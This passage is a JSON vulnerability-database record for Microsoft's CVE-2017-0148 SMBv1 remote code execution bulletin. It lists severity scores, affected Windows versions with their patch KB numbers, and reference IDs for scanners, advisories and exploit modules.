"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4012212", "KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 